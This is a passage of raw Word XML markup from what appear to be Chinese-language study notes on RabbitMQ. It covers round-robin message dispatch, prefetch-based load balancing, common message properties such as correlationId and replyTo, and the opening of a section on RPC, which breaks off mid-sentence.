          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>Consumer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>。当然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>是取余后的。它不管</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>Consumer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>是否还有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>unacked Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>，只是按照这个默认机制进行分发</w:t>
      </w:r>
      <w:r w:rsidR="00380E01">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00380E01" w:rsidRDefault="00380E01" w:rsidP="00B339FD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:hAnsi="microsoft yahei"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>correlationId</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00116DB3" w:rsidRDefault="00116DB3" w:rsidP="00B339FD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>correlationId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的关联，确保消息的请求和响应的同一性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584459" w:rsidRPr="00584459" w:rsidRDefault="00584459" w:rsidP="00B14FAB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="F000F0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>消息在队列中保存，以轮询的方式将消息发送给监听消息队列的消费者</w:t>
      </w:r>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，可以动态的增加消费者以提高消息的处理能力。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584459" w:rsidRPr="00584459" w:rsidRDefault="00584459" w:rsidP="00B14FAB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为了实现负载均衡，可以在消费者端通知</w:t>
      </w:r>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，一个消息处理完之后才会接受下一个消息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584459" w:rsidRPr="00584459" w:rsidRDefault="00584459" w:rsidP="00B14FAB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>channel.basic_qos(prefetch_count=1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584459" w:rsidRPr="00584459" w:rsidRDefault="00584459" w:rsidP="00B14FAB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注意：要防止如果所有的消费者都在处理中，则队列中的消息会累积的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584459" w:rsidRPr="00584459" w:rsidRDefault="00584459" w:rsidP="00B14FAB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>消息有</w:t>
      </w:r>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>个属性，最常用的几种：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584459" w:rsidRPr="00584459" w:rsidRDefault="00584459" w:rsidP="00B14FAB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>deliveryMode</w:t>
      </w:r>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：持久化属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584459" w:rsidRPr="00584459" w:rsidRDefault="00584459" w:rsidP="00B14FAB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>contentType</w:t>
      </w:r>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：编码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584459" w:rsidRPr="00584459" w:rsidRDefault="00584459" w:rsidP="00B14FAB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>replyTo</w:t>
      </w:r>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：指定一个回调队列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00584459" w:rsidRDefault="00584459" w:rsidP="00B14FAB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>correlationId</w:t>
      </w:r>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：消息</w:t>
      </w:r>
      <w:r w:rsidRPr="00584459">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="777777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004804C9" w:rsidRDefault="00DA54D7" w:rsidP="00B14FAB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId312" w:history="1">
        <w:r w:rsidR="001A566E" w:rsidRPr="007F16B1">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:kern w:val="0"/>
            <w:sz w:val="19"/>
            <w:szCs w:val="19"/>
          </w:rPr>
          <w:t>http://blog.itechol.com/space-33-do-blog-id-6146.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0021782C" w:rsidRDefault="0021782C" w:rsidP="00B14FAB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021782C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>http://cncc.bingj.com/cache.aspx?q=rabbitmq+%E6%B6%88%E6%81%AF%E9%9A%94%E7%A6%BB%E6%80%A7&amp;d=4903797655996480&amp;mkt=zh-CN&amp;setlang=zh-CN&amp;w=yIiZafQazMi1_TcAKKHKazLvm0PqqxIM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A566E" w:rsidRPr="00F41A4C" w:rsidRDefault="001A566E" w:rsidP="001A566E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00A7037E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidR="00A7037E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767932" w:rsidRPr="00767932" w:rsidRDefault="00767932" w:rsidP="00767932">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="369" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>本身是基于异步的消息处理，前面的示例中所有的生产者（</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）将消息发送到</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>后不会知道消费者（</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）处理成功或者失败（甚至连有没有消费者来处理这条消息都不知道）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>但实际的应用场景中，我们很可能需要一些同步处理，需要同步等待服务端将我的消息处理完成后再进行下一步处理。这相当于</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
